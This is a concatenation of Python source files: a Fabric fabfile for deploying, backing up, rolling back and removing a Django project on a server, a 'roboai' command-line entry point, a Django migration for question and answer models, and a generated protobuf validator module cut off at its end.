print(output)
print()
def print_command(command):
_print(blue("$ ", bold=True) +
yellow(command, bold=True) +
red(" ->", bold=True))
@task
def run(command, show=True, *args, **kwargs):
"""
    Runs a shell command on the remote server.
"""
if show:
print_command(command)
with hide("running"):
return _run(command, *args, **kwargs)
@task
def sudo(command, show=True, *args, **kwargs):
"""
Runs a command as sudo on the remote server.
"""
if show:
print_command(command)
with hide("running"):
return _sudo(command, *args, **kwargs)
def log_call(func):
@wraps(func)
    def logged(*args, **kwargs):
        header = "-" * len(func.__name__)
        _print(green("\n".join([header, func.__name__, header]), bold=True))
        return func(*args, **kwargs)
return logged
def get_templates():
"""
Returns each of the templates with env vars injected.
"""
injected = {}
for name, data in templates.items():
injected[name] = dict([(k, v % env) for k, v in data.items()])
return injected
def upload_template_and_reload(name):
"""
Uploads a template only if it has changed, and if so, reload the
related service.
"""
template = get_templates()[name]
local_path = template["local_path"]
if not os.path.exists(local_path):
project_root = os.path.dirname(os.path.abspath(__file__))
local_path = os.path.join(project_root, local_path)
remote_path = template["remote_path"]
reload_command = template.get("reload_command")
owner = template.get("owner")
mode = template.get("mode")
remote_data = ""
if exists(remote_path):
with hide("stdout"):
remote_data = sudo("cat %s" % remote_path, show=False)
with open(local_path, "r") as f:
local_data = f.read()
# Escape all non-string-formatting-placeholder occurrences of '%':
local_data = re.sub(r"%(?!\(\w+\)s)", "%%", local_data)
if "%(db_pass)s" in local_data:
env.db_pass = db_pass()
local_data %= env
clean = lambda s: s.replace("\n", "").replace("\r", "").strip()
if clean(remote_data) == clean(local_data):
return
upload_template(local_path, remote_path, env, use_sudo=True, backup=False)
if owner:
sudo("chown %s %s" % (owner, remote_path))
if mode:
sudo("chmod %s %s" % (mode, remote_path))
if reload_command:
sudo(reload_command)
def rsync_upload():
"""
Uploads the project with rsync excluding some files and folders.
"""
excludes = ["*.pyc", "*.pyo", "*.db", ".DS_Store", ".coverage",
"local_settings.py", "/static", "/.git", "/.hg"]
local_dir = os.getcwd() + os.sep
return rsync_project(remote_dir=env.proj_path, local_dir=local_dir,
exclude=excludes)
def vcs_upload():
"""
Uploads the project with the selected VCS tool.
"""
if env.deploy_tool == "git":
remote_path = "ssh://%s@%s%s" % (env.user, env.host_string,
env.repo_path)
if not exists(env.repo_path):
run("mkdir -p %s" % env.repo_path)
with cd(env.repo_path):
run("git init --bare")
local("git push -f %s master" % remote_path)
with cd(env.repo_path):
run("GIT_WORK_TREE=%s git checkout -f master" % env.proj_path)
run("GIT_WORK_TREE=%s git reset --hard" % env.proj_path)
elif env.deploy_tool == "hg":
remote_path = "ssh://%s@%s/%s" % (env.user, env.host_string,
env.repo_path)
with cd(env.repo_path):
if not exists("%s/.hg" % env.repo_path):
run("hg init")
print(env.repo_path)
with fab_settings(warn_only=True):
push = local("hg push -f %s" % remote_path)
if push.return_code == 255:
abort()
run("hg update")
def db_pass():
"""
Prompts for the database password if unknown.
"""
if not env.db_pass:
env.db_pass = getpass("Enter the database password: ")
return env.db_pass
@task
def apt(packages):
"""
Installs one or more system packages via apt.
"""
return sudo("apt-get install -y -q " + packages)
@task
def pip(packages):
"""
Installs one or more Python packages within the virtual environment.
"""
with virtualenv():
return run("pip install %s" % packages)
def postgres(command):
"""
Runs the given command as the postgres user.
"""
show = not command.startswith("psql")
return sudo(command, show=show, user="postgres")
@task
def psql(sql, show=True):
"""
Runs SQL against the project's database.
"""
out = postgres('psql -c "%s"' % sql)
if show:
print_command(sql)
return out
@task
def backup(filename):
"""
Backs up the project database.
"""
tmp_file = "/tmp/%s" % filename
# We dump to /tmp because user "postgres" can't write to other user folders
# We cd to / because user "postgres" might not have read permissions
# elsewhere.
with cd("/"):
postgres("pg_dump -Fc %s > %s" % (env.proj_name, tmp_file))
run("cp %s ." % tmp_file)
sudo("rm -f %s" % tmp_file)
@task
def restore(filename):
"""
Restores the project database from a previous backup.
"""
return postgres("pg_restore -c -d %s %s" % (env.proj_name, filename))
@task
def python(code, show=True):
"""
Runs Python code in the project's virtual environment, with Django loaded.
"""
setup = "import os;" \
"os.environ[\'DJANGO_SETTINGS_MODULE\']=\'%s.settings\';" \
"import django;" \
"django.setup();" % env.proj_app
full_code = 'python -c "%s%s"' % (setup, code.replace("`", "\\\`"))
with project():
if show:
print_command(code)
result = run(full_code, show=False)
return result
def static():
"""
Returns the live STATIC_ROOT directory.
"""
return python("from django.conf import settings;"
"print(settings.STATIC_ROOT)", show=False).split("\n")[-1]
@task
def manage(command):
"""
Runs a Django management command.
"""
return run("%s %s" % (env.manage, command))
###########################
# Security best practices #
###########################
@task
@log_call
@hosts(["root@%s" % host for host in env.hosts])
def secure(new_user=env.user):
"""
Minimal security steps for brand new servers.
Installs system updates, creates new user (with sudo privileges) for future
usage, and disables root login via SSH.
"""
run("apt-get update -q")
run("apt-get upgrade -y -q")
run("adduser --gecos '' %s" % new_user)
run("usermod -G sudo %s" % new_user)
run("sed -i 's:RootLogin yes:RootLogin no:' /etc/ssh/sshd_config")
run("service ssh restart")
print(green("Security steps completed. Log in to the server as '%s' from "
"now on." % new_user, bold=True))
#########################
# Install and configure #
#########################
@task
@log_call
def install():
"""
Installs the base system and Python requirements for the entire server.
"""
# Install system requirements
sudo("apt-get update -y -q")
apt("nginx libjpeg-dev python-dev python-setuptools git-core "
"postgresql libpq-dev memcached supervisor python-pip")
run("mkdir -p /home/%s/logs" % env.user)
# Install Python requirements
sudo("pip install -U pip virtualenv virtualenvwrapper mercurial")
# Set up virtualenv
run("mkdir -p %s" % env.venv_home)
run("echo 'export WORKON_HOME=%s' >> /home/%s/.bashrc" % (env.venv_home,
env.user))
run("echo 'source /usr/local/bin/virtualenvwrapper.sh' >> "
"/home/%s/.bashrc" % env.user)
print(green("Successfully set up git, mercurial, pip, virtualenv, "
"supervisor, memcached.", bold=True))
@task
@log_call
def create():
"""
Creates the environment needed to host the project.
The environment consists of: system locales, virtualenv, database, project
files, SSL certificate, and project-specific Python requirements.
"""
# Generate project locale
locale = env.locale.replace("UTF-8", "utf8")
with hide("stdout"):
if locale not in run("locale -a"):
sudo("locale-gen %s" % env.locale)
sudo("update-locale %s" % env.locale)
sudo("service postgresql restart")
run("exit")
# Create project path
run("mkdir -p %s" % env.proj_path)
# Set up virtual env
run("mkdir -p %s" % env.venv_home)
with cd(env.venv_home):
if exists(env.proj_name):
if confirm("Virtualenv already exists in host server: %s"
"\nWould you like to replace it?" % env.proj_name):
run("rm -rf %s" % env.proj_name)
else:
abort()
run("virtualenv %s" % env.proj_name)
# Upload project files
if env.deploy_tool in env.vcs_tools:
vcs_upload()
else:
rsync_upload()
# Create DB and DB user
pw = db_pass()
    user_sql_args = (env.proj_name, pw.replace("'", "''"))  # double single quotes to escape them in the SQL literal
user_sql = "CREATE USER %s WITH ENCRYPTED PASSWORD '%s';" % user_sql_args
psql(user_sql, show=False)
shadowed = "*" * len(pw)
print_command(user_sql.replace("'%s'" % pw, "'%s'" % shadowed))
psql("CREATE DATABASE %s WITH OWNER %s ENCODING = 'UTF8' "
"LC_CTYPE = '%s' LC_COLLATE = '%s' TEMPLATE template0;" %
(env.proj_name, env.proj_name, env.locale, env.locale))
# Set up SSL certificate
if not env.ssl_disabled:
conf_path = "/etc/nginx/conf"
if not exists(conf_path):
sudo("mkdir %s" % conf_path)
with cd(conf_path):
crt_file = env.proj_name + ".crt"
key_file = env.proj_name + ".key"
if not exists(crt_file) and not exists(key_file):
try:
crt_local, = glob(join("deploy", "*.crt"))
key_local, = glob(join("deploy", "*.key"))
except ValueError:
parts = (crt_file, key_file, env.domains[0])
sudo("openssl req -new -x509 -nodes -out %s -keyout %s "
"-subj '/CN=%s' -days 3650" % parts)
else:
upload_template(crt_local, crt_file, use_sudo=True)
upload_template(key_local, key_file, use_sudo=True)
# Install project-specific requirements
upload_template_and_reload("settings")
with project():
if env.reqs_path:
pip("-r %s/%s" % (env.proj_path, env.reqs_path))
pip("gunicorn setproctitle psycopg2 "
"django-compressor python-memcached")
# Bootstrap the DB
manage("createdb --noinput --nodata")
python("from django.conf import settings;"
"from django.contrib.sites.models import Site;"
"Site.objects.filter(id=settings.SITE_ID).update(domain='%s');"
% env.domains[0])
for domain in env.domains:
python("from django.contrib.sites.models import Site;"
"Site.objects.get_or_create(domain='%s');" % domain)
if env.admin_pass:
pw = env.admin_pass
user_py = ("from django.contrib.auth import get_user_model;"
"User = get_user_model();"
"u, _ = User.objects.get_or_create(username='admin');"
"u.is_staff = u.is_superuser = True;"
"u.set_password('%s');"
"u.save();" % pw)
python(user_py, show=False)
shadowed = "*" * len(pw)
print_command(user_py.replace("'%s'" % pw, "'%s'" % shadowed))
return True
@task
@log_call
def remove():
"""
Blow away the current project.
"""
if exists(env.venv_path):
run("rm -rf %s" % env.venv_path)
if exists(env.proj_path):
run("rm -rf %s" % env.proj_path)
for template in get_templates().values():
remote_path = template["remote_path"]
if exists(remote_path):
sudo("rm %s" % remote_path)
if exists(env.repo_path):
run("rm -rf %s" % env.repo_path)
sudo("supervisorctl update")
psql("DROP DATABASE IF EXISTS %s;" % env.proj_name)
psql("DROP USER IF EXISTS %s;" % env.proj_name)
##############
# Deployment #
##############
@task
@log_call
def restart():
"""
Restart gunicorn worker processes for the project.
If the processes are not running, they will be started.
"""
pid_path = "%s/gunicorn.pid" % env.proj_path
if exists(pid_path):
run("kill -HUP `cat %s`" % pid_path)
else:
sudo("supervisorctl update")
@task
@log_call
def deploy():
"""
Deploy latest version of the project.
Backup current version of the project, push latest version of the project
via version control or rsync, install new requirements, sync and migrate
the database, collect any new static assets, and restart gunicorn's worker
processes for the project.
"""
if not exists(env.proj_path):
if confirm("Project does not exist in host server: %s"
"\nWould you like to create it?" % env.proj_name):
create()
else:
abort()
# Backup current version of the project
with cd(env.proj_path):
backup("last.db")
if env.deploy_tool in env.vcs_tools:
with cd(env.repo_path):
if env.deploy_tool == "git":
run("git rev-parse HEAD > %s/last.commit" % env.proj_path)
elif env.deploy_tool == "hg":
run("hg id -i > last.commit")
with project():
static_dir = static()
if exists(static_dir):
run("tar -cf static.tar --exclude='*.thumbnails' %s" %
static_dir)
else:
with cd(join(env.proj_path, "..")):
excludes = ["*.pyc", "*.pio", "*.thumbnails"]
exclude_arg = " ".join("--exclude='%s'" % e for e in excludes)
run("tar -cf {0}.tar {1} {0}".format(env.proj_name, exclude_arg))
# Deploy latest version of the project
with update_changed_requirements():
if env.deploy_tool in env.vcs_tools:
vcs_upload()
else:
rsync_upload()
with project():
manage("collectstatic -v 0 --noinput")
manage("syncdb --noinput")
manage("migrate --noinput")
for name in get_templates():
upload_template_and_reload(name)
restart()
return True
@task
@log_call
def rollback():
"""
Reverts project state to the last deploy.
When a deploy is performed, the current state of the project is
backed up. This includes the project files, the database, and all static
files. Calling rollback will revert all of these to their state prior to
the last deploy.
"""
with update_changed_requirements():
if env.deploy_tool in env.vcs_tools:
with cd(env.repo_path):
if env.deploy_tool == "git":
run("GIT_WORK_TREE={0} git checkout -f "
"`cat {0}/last.commit`".format(env.proj_path))
elif env.deploy_tool == "hg":
run("hg update -C `cat last.commit`")
with project():
with cd(join(static(), "..")):
run("tar -xf %s/static.tar" % env.proj_path)
else:
with cd(env.proj_path.rsplit("/", 1)[0]):
run("rm -rf %s" % env.proj_name)
run("tar -xf %s.tar" % env.proj_name)
with cd(env.proj_path):
restore("last.db")
restart()
@task
@log_call
def all():
"""
    Installs everything required on a new system and deploys the project.
From the base software, up to the deployed project.
"""
install()
if create():
deploy()
|
py | b4103a2e41c1b957ad79f8df7c9c3eeeb2f7f162 | import click
from roboai_cli.commands import (
login,
logout,
connect,
deploy,
remove,
stop,
start,
seed,
status,
environment,
package,
clean,
logs,
diff,
train,
run,
shell,
test,
interactive,
stories
)
from pyfiglet import Figlet
from roboai_cli.__init__ import __version__ # this is wrong but won't work otherwise
from roboai_cli.util.cli import print_message
from roboai_cli.util.text import remove_last_line
@click.group(help=f"roboai {__version__}")
@click.version_option(version=__version__, message=f"roboai {__version__}")
def cli():
pass
cli.add_command(login.command)
cli.add_command(logout.command)
cli.add_command(connect.command)
cli.add_command(deploy.command)
cli.add_command(remove.command)
cli.add_command(stop.command)
cli.add_command(start.command)
cli.add_command(seed.command)
cli.add_command(status.command)
cli.add_command(environment.command)
cli.add_command(package.command)
cli.add_command(clean.command)
cli.add_command(logs.command)
cli.add_command(diff.command)
cli.add_command(train.command)
cli.add_command(run.command)
cli.add_command(shell.command)
cli.add_command(stories.command)
cli.add_command(test.command)
cli.add_command(interactive.command)
try:
import colorama
colorama.init()
except Exception:  # colorama is optional; ignore failures to initialise it
pass
def get_motd():
figlet = Figlet(font="standard")
logo = figlet.renderText("ROBO . AI")
logo = remove_last_line(remove_last_line(logo))
logo += "\nBot Management Tool robo-ai.com\n"
return logo
def run():
print_message(get_motd())
cli()
if __name__ == "__main__":
run()
|
py | b4103d1a9faf8c637e6e95c0e5ef5132b507c36f | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2018-07-23 18:01
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Answer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('AnswerTitle', models.TextField()),
('AnsweredAt', models.DateTimeField(auto_now=True)),
],
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('QuestionTitle', models.TextField()),
('AskedAt', models.DateTimeField(auto_now=True)),
('IsAnswered', models.BooleanField(default=False)),
('QueriedBy', models.CharField(default=None, max_length=100)),
('CreatedFor', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='answer',
name='Question',
field=models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to='query.Question'),
),
]
|
py | b4103d3058c56d8ad940b9129a0bcffa7238e37e | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: proto/validator.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import descriptor_pool as _descriptor_pool
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import descriptor_pb2 as google_dot_protobuf_dot_descriptor__pb2
DESCRIPTOR = _descriptor_pool.Default().AddSerializedFile(b'\n\x15proto/validator.proto\x12\tvalidator\x1a google/protobuf/descriptor.proto\"Y\n\x0cValidOptions\x12$\n\x08\x63heck_if\x18\x01 \x01(\x0b\x32\x12.validator.CheckIf\x12#\n\x04tags\x18\x02 \x01(\x0b\x32\x15.validator.TagOptions\"=\n\x07\x43heckIf\x12\r\n\x05\x66ield\x18\x01 \x01(\t\x12#\n\x04tags\x18\x02 \x01(\x0b\x32\x15.validator.TagOptions\"\xbf\x03\n\nTagOptions\x12%\n\x05oneof\x18\x14 \x01(\x0b\x32\x14.validator.OneOfTagsH\x00\x12%\n\x05\x66loat\x18\x15 \x01(\x0b\x32\x14.validator.FloatTagsH\x00\x12!\n\x03int\x18\x16 \x01(\x0b\x32\x12.validator.IntTagsH\x00\x12#\n\x04uint\x18\x17 \x01(\x0b\x32\x13.validator.UintTagsH\x00\x12\'\n\x06string\x18\x18 \x01(\x0b\x32\x15.validator.StringTagsH\x00\x12%\n\x05\x62ytes\x18\x19 \x01(\x0b\x32\x14.validator.BytesTagsH\x00\x12#\n\x04\x62ool\x18\x1a \x01(\x0b\x32\x13.validator.BoolTagsH\x00\x12#\n\x04\x65num\x18\x1b \x01(\x0b\x32\x13.validator.EnumTagsH\x00\x12)\n\x07message\x18\x1c \x01(\x0b\x32\x16.validator.MessageTagsH\x00\x12+\n\x08repeated\x18\x1d \x01(\x0b\x32\x17.validator.RepeatedTagsH\x00\x12!\n\x03map\x18\x1e \x01(\x0b\x32\x12.validator.MapTagsH\x00\x42\x06\n\x04kind\"/\n\tOneOfTags\x12\x15\n\x08not_null\x18\x01 \x01(\x08H\x00\x88\x01\x01\x42\x0b\n\t_not_null\"\xbb\x01\n\tFloatTags\x12\x0f\n\x02\x65q\x18\x03 \x01(\x01H\x00\x88\x01\x01\x12\x0f\n\x02ne\x18\x04 \x01(\x01H\x01\x88\x01\x01\x12\x0f\n\x02lt\x18\x05 \x01(\x01H\x02\x88\x01\x01\x12\x0f\n\x02gt\x18\x06 \x01(\x01H\x03\x88\x01\x01\x12\x10\n\x03lte\x18\x07 \x01(\x01H\x04\x88\x01\x01\x12\x10\n\x03gte\x18\x08 \x01(\x01H\x05\x88\x01\x01\x12\n\n\x02in\x18\t \x03(\x01\x12\x0e\n\x06not_in\x18\n \x03(\x01\x42\x05\n\x03_eqB\x05\n\x03_neB\x05\n\x03_ltB\x05\n\x03_gtB\x06\n\x04_lteB\x06\n\x04_gte\"\xb9\x01\n\x07IntTags\x12\x0f\n\x02\x65q\x18\x03 \x01(\x03H\x00\x88\x01\x01\x12\x0f\n\x02ne\x18\x04 \x01(\x03H\x01\x88\x01\x01\x12\x0f\n\x02lt\x18\x05 \x01(\x03H\x02\x88\x01\x01\x12\x0f\n\x02gt\x18\x06 \x01(\x03H\x03\x88\x01\x01\x12\x10\n\x03lte\x18\x07 \x01(\x03H\x04\x88\x01\x01\x12\x10\n\x03gte\x18\x08 \x01(\x03H\x05\x88\x01\x01\x12\n\n\x02in\x18\t \x03(\x03\x12\x0e\n\x06not_in\x18\n \x03(\x03\x42\x05\n\x03_eqB\x05\n\x03_neB\x05\n\x03_ltB\x05\n\x03_gtB\x06\n\x04_lteB\x06\n\x04_gte\"\xba\x01\n\x08UintTags\x12\x0f\n\x02\x65q\x18\x03 \x01(\x04H\x00\x88\x01\x01\x12\x0f\n\x02ne\x18\x04 \x01(\x04H\x01\x88\x01\x01\x12\x0f\n\x02lt\x18\x05 \x01(\x04H\x02\x88\x01\x01\x12\x0f\n\x02gt\x18\x06 \x01(\x04H\x03\x88\x01\x01\x12\x10\n\x03lte\x18\x07 \x01(\x04H\x04\x88\x01\x01\x12\x10\n\x03gte\x18\x08 \x01(\x04H\x05\x88\x01\x01\x12\n\n\x02in\x18\t \x03(\x04\x12\x0e\n\x06not_in\x18\n \x03(\x04\x42\x05\n\x03_eqB\x05\n\x03_neB\x05\n\x03_ltB\x05\n\x03_gtB\x06\n\x04_lteB\x06\n\x04_gte\"\xcb\x15\n\nStringTags\x12\x0f\n\x02\x65q\x18\x03 \x01(\tH\x00\x88\x01\x01\x12\x0f\n\x02ne\x18\x04 \x01(\tH\x01\x88\x01\x01\x12\x0f\n\x02lt\x18\x05 \x01(\tH\x02\x88\x01\x01\x12\x0f\n\x02gt\x18\x06 \x01(\tH\x03\x88\x01\x01\x12\x10\n\x03lte\x18\x07 \x01(\tH\x04\x88\x01\x01\x12\x10\n\x03gte\x18\x08 \x01(\tH\x05\x88\x01\x01\x12\n\n\x02in\x18\t \x03(\t\x12\x0e\n\x06not_in\x18\n \x03(\t\x12\x18\n\x0b\x63har_len_eq\x18\x14 \x01(\x03H\x06\x88\x01\x01\x12\x18\n\x0b\x63har_len_ne\x18\x15 \x01(\x03H\x07\x88\x01\x01\x12\x18\n\x0b\x63har_len_gt\x18\x16 \x01(\x03H\x08\x88\x01\x01\x12\x18\n\x0b\x63har_len_lt\x18\x17 \x01(\x03H\t\x88\x01\x01\x12\x19\n\x0c\x63har_len_gte\x18\x18 \x01(\x03H\n\x88\x01\x01\x12\x19\n\x0c\x63har_len_lte\x18\x19 \x01(\x03H\x0b\x88\x01\x01\x12\x18\n\x0b\x62yte_len_eq\x18\x1e 
\x01(\x03H\x0c\x88\x01\x01\x12\x18\n\x0b\x62yte_len_ne\x18\x1f \x01(\x03H\r\x88\x01\x01\x12\x18\n\x0b\x62yte_len_gt\x18 \x01(\x03H\x0e\x88\x01\x01\x12\x18\n\x0b\x62yte_len_lt\x18! \x01(\x03H\x0f\x88\x01\x01\x12\x19\n\x0c\x62yte_len_gte\x18\" \x01(\x03H\x10\x88\x01\x01\x12\x19\n\x0c\x62yte_len_lte\x18# \x01(\x03H\x11\x88\x01\x01\x12\x12\n\x05regex\x18( \x01(\tH\x12\x88\x01\x01\x12\x13\n\x06prefix\x18) \x01(\tH\x13\x88\x01\x01\x12\x16\n\tno_prefix\x18* \x01(\tH\x14\x88\x01\x01\x12\x13\n\x06suffix\x18+ \x01(\tH\x15\x88\x01\x01\x12\x16\n\tno_suffix\x18, \x01(\tH\x16\x88\x01\x01\x12\x15\n\x08\x63ontains\x18- \x01(\tH\x17\x88\x01\x01\x12\x19\n\x0cnot_contains\x18. \x01(\tH\x18\x88\x01\x01\x12\x19\n\x0c\x63ontains_any\x18/ \x01(\tH\x19\x88\x01\x01\x12\x1d\n\x10not_contains_any\x18\x30 \x01(\tH\x1a\x88\x01\x01\x12\x11\n\x04utf8\x18Q \x01(\x08H\x1b\x88\x01\x01\x12\x12\n\x05\x61scii\x18G \x01(\x08H\x1c\x88\x01\x01\x12\x18\n\x0bprint_ascii\x18H \x01(\x08H\x1d\x88\x01\x01\x12\x14\n\x07\x62oolean\x18I \x01(\x08H\x1e\x88\x01\x01\x12\x16\n\tlowercase\x18J \x01(\x08H\x1f\x88\x01\x01\x12\x16\n\tuppercase\x18K \x01(\x08H \x88\x01\x01\x12\x12\n\x05\x61lpha\x18L \x01(\x08H!\x88\x01\x01\x12\x13\n\x06number\x18M \x01(\x08H\"\x88\x01\x01\x12\x19\n\x0c\x61lpha_number\x18N \x01(\x08H#\x88\x01\x01\x12\x0f\n\x02ip\x18\x65 \x01(\x08H$\x88\x01\x01\x12\x11\n\x04ipv4\x18\x66 \x01(\x08H%\x88\x01\x01\x12\x11\n\x04ipv6\x18g \x01(\x08H&\x88\x01\x01\x12\x14\n\x07ip_addr\x18h \x01(\x08H\'\x88\x01\x01\x12\x15\n\x08ip4_addr\x18i \x01(\x08H(\x88\x01\x01\x12\x15\n\x08ip6_addr\x18j \x01(\x08H)\x88\x01\x01\x12\x11\n\x04\x63idr\x18k \x01(\x08H*\x88\x01\x01\x12\x13\n\x06\x63idrv4\x18l \x01(\x08H+\x88\x01\x01\x12\x13\n\x06\x63idrv6\x18m \x01(\x08H,\x88\x01\x01\x12\x15\n\x08tcp_addr\x18o \x01(\x08H-\x88\x01\x01\x12\x16\n\ttcp4_addr\x18p \x01(\x08H.\x88\x01\x01\x12\x16\n\ttcp6_addr\x18q \x01(\x08H/\x88\x01\x01\x12\x15\n\x08udp_addr\x18r \x01(\x08H0\x88\x01\x01\x12\x16\n\tudp4_addr\x18s \x01(\x08H1\x88\x01\x01\x12\x16\n\tudp6_addr\x18t \x01(\x08H2\x88\x01\x01\x12\x10\n\x03mac\x18n \x01(\x08H3\x88\x01\x01\x12\x16\n\tunix_addr\x18u \x01(\x08H4\x88\x01\x01\x12\x15\n\x08hostname\x18v \x01(\x08H5\x88\x01\x01\x12\x1d\n\x10hostname_rfc1123\x18w \x01(\x08H6\x88\x01\x01\x12\x1a\n\rhostname_port\x18x \x01(\x08H7\x88\x01\x01\x12\x15\n\x08\x64\x61ta_uri\x18y \x01(\x08H8\x88\x01\x01\x12\x11\n\x04\x66qdn\x18z \x01(\x08H9\x88\x01\x01\x12\x10\n\x03uri\x18{ \x01(\x08H:\x88\x01\x01\x12\x10\n\x03url\x18| \x01(\x08H;\x88\x01\x01\x12\x18\n\x0burl_encoded\x18} \x01(\x08H<\x88\x01\x01\x12\x16\n\tunix_cron\x18P \x01(\x08H=\x88\x01\x01\x12\x13\n\x05\x65mail\x18\x8c\x01 \x01(\x08H>\x88\x01\x01\x12\x12\n\x04json\x18\x8d\x01 \x01(\x08H?\x88\x01\x01\x12\x11\n\x03jwt\x18\x8e\x01 \x01(\x08H@\x88\x01\x01\x12\x12\n\x04html\x18\x8f\x01 \x01(\x08HA\x88\x01\x01\x12\x1a\n\x0chtml_encoded\x18\x90\x01 \x01(\x08HB\x88\x01\x01\x12\x14\n\x06\x62\x61se64\x18\x91\x01 \x01(\x08HC\x88\x01\x01\x12\x18\n\nbase64_url\x18\x92\x01 \x01(\x08HD\x88\x01\x01\x12\x19\n\x0bhexadecimal\x18\x93\x01 \x01(\x08HE\x88\x01\x01\x12\x16\n\x08\x64\x61tetime\x18\x94\x01 \x01(\tHF\x88\x01\x01\x12\x16\n\x08timezone\x18\x95\x01 \x01(\x08HG\x88\x01\x01\x12\x12\n\x04uuid\x18\x96\x01 \x01(\x08HH\x88\x01\x01\x12\x13\n\x05uuid1\x18\x97\x01 \x01(\x08HI\x88\x01\x01\x12\x13\n\x05uuid3\x18\x98\x01 \x01(\x08HJ\x88\x01\x01\x12\x13\n\x05uuid4\x18\x99\x01 \x01(\x08HK\x88\x01\x01\x12\x13\n\x05uuid5\x18\x9a\x01 
\x01(\x08HL\x88\x01\x01\x42\x05\n\x03_eqB\x05\n\x03_neB\x05\n\x03_ltB\x05\n\x03_gtB\x06\n\x04_lteB\x06\n\x04_gteB\x0e\n\x0c_char_len_eqB\x0e\n\x0c_char_len_neB\x0e\n\x0c_char_len_gtB\x0e\n\x0c_char_len_ltB\x0f\n\r_char_len_gteB\x0f\n\r_char_len_lteB\x0e\n\x0c_byte_len_eqB\x0e\n\x0c_byte_len_neB\x0e\n\x0c_byte_len_gtB\x0e\n\x0c_byte_len_ltB\x0f\n\r_byte_len_gteB\x0f\n\r_byte_len_lteB\x08\n\x06_regexB\t\n\x07_prefixB\x0c\n\n_no_prefixB\t\n\x07_suffixB\x0c\n\n_no_suffixB\x0b\n\t_containsB\x0f\n\r_not_containsB\x0f\n\r_contains_anyB\x13\n\x11_not_contains_anyB\x07\n\x05_utf8B\x08\n\x06_asciiB\x0e\n\x0c_print_asciiB\n\n\x08_booleanB\x0c\n\n_lowercaseB\x0c\n\n_uppercaseB\x08\n\x06_alphaB\t\n\x07_numberB\x0f\n\r_alpha_numberB\x05\n\x03_ipB\x07\n\x05_ipv4B\x07\n\x05_ipv6B\n\n\x08_ip_addrB\x0b\n\t_ip4_addrB\x0b\n\t_ip6_addrB\x07\n\x05_cidrB\t\n\x07_cidrv4B\t\n\x07_cidrv6B\x0b\n\t_tcp_addrB\x0c\n\n_tcp4_addrB\x0c\n\n_tcp6_addrB\x0b\n\t_udp_addrB\x0c\n\n_udp4_addrB\x0c\n\n_udp6_addrB\x06\n\x04_macB\x0c\n\n_unix_addrB\x0b\n\t_hostnameB\x13\n\x11_hostname_rfc1123B\x10\n\x0e_hostname_portB\x0b\n\t_data_uriB\x07\n\x05_fqdnB\x06\n\x04_uriB\x06\n\x04_urlB\x0e\n\x0c_url_encodedB\x0c\n\n_unix_cronB\x08\n\x06_emailB\x07\n\x05_jsonB\x06\n\x04_jwtB\x07\n\x05_htmlB\x0f\n\r_html_encodedB\t\n\x07_base64B\r\n\x0b_base64_urlB\x0e\n\x0c_hexadecimalB\x0b\n\t_datetimeB\x0b\n\t_timezoneB\x07\n\x05_uuidB\x08\n\x06_uuid1B\x08\n\x06_uuid3B\x08\n\x06_uuid4B\x08\n\x06_uuid5\"\xcf\x01\n\tBytesTags\x12\x13\n\x06len_eq\x18\x03 \x01(\x03H\x00\x88\x01\x01\x12\x13\n\x06len_ne\x18\x04 \x01(\x03H\x01\x88\x01\x01\x12\x13\n\x06len_lt\x18\x05 \x01(\x03H\x02\x88\x01\x01\x12\x13\n\x06len_gt\x18\x06 \x01(\x03H\x03\x88\x01\x01\x12\x14\n\x07len_lte\x18\x07 \x01(\x03H\x04\x88\x01\x01\x12\x14\n\x07len_gte\x18\x08 \x01(\x03H\x05\x88\x01\x01\x42\t\n\x07_len_eqB\t\n\x07_len_neB\t\n\x07_len_ltB\t\n\x07_len_gtB\n\n\x08_len_lteB\n\n\x08_len_gte\"\"\n\x08\x42oolTags\x12\x0f\n\x02\x65q\x18\x03 \x01(\x08H\x00\x88\x01\x01\x42\x05\n\x03_eq\"\xde\x01\n\x08\x45numTags\x12\x0f\n\x02\x65q\x18\x03 \x01(\x05H\x00\x88\x01\x01\x12\x0f\n\x02ne\x18\x04 \x01(\x05H\x01\x88\x01\x01\x12\x0f\n\x02lt\x18\x05 \x01(\x05H\x02\x88\x01\x01\x12\x0f\n\x02gt\x18\x06 \x01(\x05H\x03\x88\x01\x01\x12\x10\n\x03lte\x18\x07 \x01(\x05H\x04\x88\x01\x01\x12\x10\n\x03gte\x18\x08 \x01(\x05H\x05\x88\x01\x01\x12\n\n\x02in\x18\t \x03(\x05\x12\x0e\n\x06not_in\x18\n \x03(\x05\x12\x15\n\x08in_enums\x18\x0b \x01(\x08H\x06\x88\x01\x01\x42\x05\n\x03_eqB\x05\n\x03_neB\x05\n\x03_ltB\x05\n\x03_gtB\x06\n\x04_lteB\x06\n\x04_gteB\x0b\n\t_in_enums\"M\n\x0bMessageTags\x12\x15\n\x08not_null\x18\x02 \x01(\x08H\x00\x88\x01\x01\x12\x11\n\x04skip\x18\x03 \x01(\x08H\x01\x88\x01\x01\x42\x0b\n\t_not_nullB\x07\n\x05_skip\"\xbb\x02\n\x0cRepeatedTags\x12\x15\n\x08not_null\x18\x02 \x01(\x08H\x00\x88\x01\x01\x12\x13\n\x06len_eq\x18\x03 \x01(\x03H\x01\x88\x01\x01\x12\x13\n\x06len_ne\x18\x04 \x01(\x03H\x02\x88\x01\x01\x12\x13\n\x06len_lt\x18\x05 \x01(\x03H\x03\x88\x01\x01\x12\x13\n\x06len_gt\x18\x06 \x01(\x03H\x04\x88\x01\x01\x12\x14\n\x07len_lte\x18\x07 